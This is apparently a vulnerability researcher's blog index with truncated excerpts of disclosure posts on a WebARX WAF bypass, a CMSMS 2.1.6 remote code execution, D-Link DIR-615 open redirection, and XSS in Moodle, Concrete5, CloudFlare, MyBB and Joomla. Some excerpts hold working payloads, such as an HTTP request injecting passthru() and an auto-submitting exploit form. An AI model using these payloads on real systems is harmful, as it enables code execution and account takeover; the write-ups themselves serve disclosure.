Bypassing the WebARX Web Application Firewall (WAF)

WebARX is a web application firewall where you can protect your website from malicious attacks. As you can see it was mentioned in TheHackerNews as well and has good ratings if you do some Googling.
https://thehackernews.com/2019/09/webarx-web-application-security.html

It was found out that the WebARX WAF could be easily bypassed by passing a whitelist string. As you see the request won’t be processed by the WAF if it detects a whitelist string.

Let’s first try on their own website. This is a simple LFi payload.


(more…)

CMSMS 2.1.6 Multiple Vulnerabilities

One day I felt like reviewing the source code of some random CMS and I picked CMSMS. This is totally random and I did this to kill boredom.

Remote Code Execution – CVE-2017-8912

In admin/editusertag.php you can create custom user defined tags in which evil PHP functions are not blacklisted.

[code language=”text”]
POST /cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4
Content-Length: 115
Cookie: cms_admin_user_id=1; cms_passhash=4df45e48ad5885afabe27e446666421b; _sk_=2a7da2216d41e0ac; CMSSESSIDacef9ab5f31b=mckpbvrmtj7n6ri53kiol718c5
Connection: close
Pragma: no-cache
Cache-Control: no-cache

_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru(‘dir’)%3B&description=&run=1&apply=1&ajax=1
[/code]


(more…)

D-Link DIR-615 Open Redirection and XSS

D-Link DIR-615
Hardware Version: E3
Firmware Version: 5.10

The ‘apply.cgi’ file was vulnerable to Open Redirection and XSS. Inside the router many other cgi files too use this functionality in ‘apply.cgi’. For example the ‘ping_response.cgi’ file.

Open Redirection

apply.cgi

<html>
<!-- @OsandaMalith -->
  <body>
    <form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
      <input type="hidden" name="html_response_page" value="https://google.lk" />
      <input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
    <img src=x onerror="exploit.submit()"/>
    </form>
  </body>
</html>

(more…)

Bypassing IE and Edge XSS Filters with Double Encoding

IE and Edge both uses a default XSS filter which is not powerful like the XSSAuditor(Webkit/Blink).
This is how the XSS filter is implemented.

https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/swi/WindowsLiveWriter/IE8XSSFilterArchitectureImplementation_7E69/pic1_thumb.png
(source: https://blogs.technet.microsoft.com/srd/2008/08/19/ie-8-xss-filter-architecture-implementation/)
(more…)

Moodle 2.7 Persistent XSS

Overview

I hope you all have heard about the Moodle project. The full form is Moodle Modular Object-Oriented Dynamic Learning Environment. This project is a free open-source project which focuses in teaching and learning online courses effectively. Most of the universities, colleges, educational institutes use this application in interacting with students. You can read and research more information on Wikipedia.

Vulnerability and Exploit

This is a persistent XSS I found in Moodle 2.7. Well, this vulnerability was present from the version 2.4.9 till 2.7 so far hidden from the eye 😉 luckily I spotted this while I was fuzzing random stuff against the application.

Edit your user profile and under “Optional” you can see “Skype ID”. Let’s inject some HTML into the Skype ID field and check the output

[code language=”html”]
“>>><h1>Hello World</h1>
[/code]

It seems like our input is echoed back thrice. In one line the input is being URL encoded since it should be the URL of the user and in another it is being converted to HTML entities, while in the other field it seems like our input is being filtered out. I love to break filters. Here is my quick and small analysis in detail.

Output 1:

[code language=”html”]
<a href=”skype:%22%3E%3E%3EHello+World?call”>
[/code]

Output 2:

[code language=”html”]
&quot;&gt;&gt;&gt;Hello World
[/code] (more…)

Concrete 5.6.2.1 Multiple XSS

While I was playing around with Concrete 5.6.2.1 CMS, I wanted to know how this application shows us a hyperlink to the “Back” button. I found something interesting in the “download_file.php” file.


\concrete\single_pages\download_file.php

line 27

[code language=”php” highlight=”5″]
<form action="<?php echo View::url(‘/download_file’, ‘submit_password’, $fID) ?>" method="post">
<?php if(isset($force)) { ?>
<input type="hidden" value="<?php echo $force ?>" name="force" />
<?php } ?>
<input type="hidden" value="<?php echo $returnURL ?>" name="returnURL" />
<input type="hidden" value="<?php echo $rcID ?>" name="rcID"/>
<label for="password"><?php echo t(‘Password’)?>: <input type="password" name="password" /></label>
<br /><br />
<button type="submit"><?php echo t(‘Download’)?></button>
</form>
[/code]

Let’s have a look at the “$returnURL” variable. (more…)

XSS in CloudFlare

#1 XSS

These are some of my duplicate vulnerabilities found. I just thought of sharing with you. Recently I found two POST XSS in CloudFlare and unfortunately I was not the first to report.
I found the first issue in the “Confirm Key Generator” dialog box.

View post on imgur.com

Let’s have a closer look at the URL.

/ajax/model-dialog.htm

It seems like an XMLHttpRequest object is used in the server side it accept our POST request. (more…)

MyBB 1.6.12 POST XSS 0day

This is a weird bug I found in MyBB. I fuzzed the input of the search.php file. This was my input given.

alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload

MyBB throws out a SQL error:

[code language=”sql”]
SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1 AND t.closed NOT LIKE ‘moved|%’
AND ( LOWER(t.subject) LIKE ‘%&lt;foo&gt; &lt;h1&gt; &lt;script&gt; alert (bar) () ; //%’ LOWER(t.subject)
LIKE ‘%&gt; &lt; prompt \x41 \%42 constructor onload%’)

[/code]

fuzz1
(more…)

My Joomla XSS 0days

Last October 2013 I found some XSS vulnerabilities in Joomla! 3.1.2. Anyhow the affected versions were Joomla! version 2.5.14 and earlier 2.5.x versions and version 3.1.5 and earlier 3.0.x
versions. Actually all these XSS vulnerabilities existed on fields where we can insert links starting with http://. I first did a simple fuzz to test the output.

<foo> </bar> '" > <> ; () //

What I noticed was that it does filter out tags but still we can take advantage of these non-filtered characters. Of course we can use event handlers in JavaScript to trigger XSS.

‘; ()//"

fuzz

Persistent XSS in com_contact

To reproduce this issue follow these steps.

  • Click components -> Contacts-> Contacts. This is the URL: http://localhost/Joomla_3.1.5/administrator/index.php?option=com_contact (more…)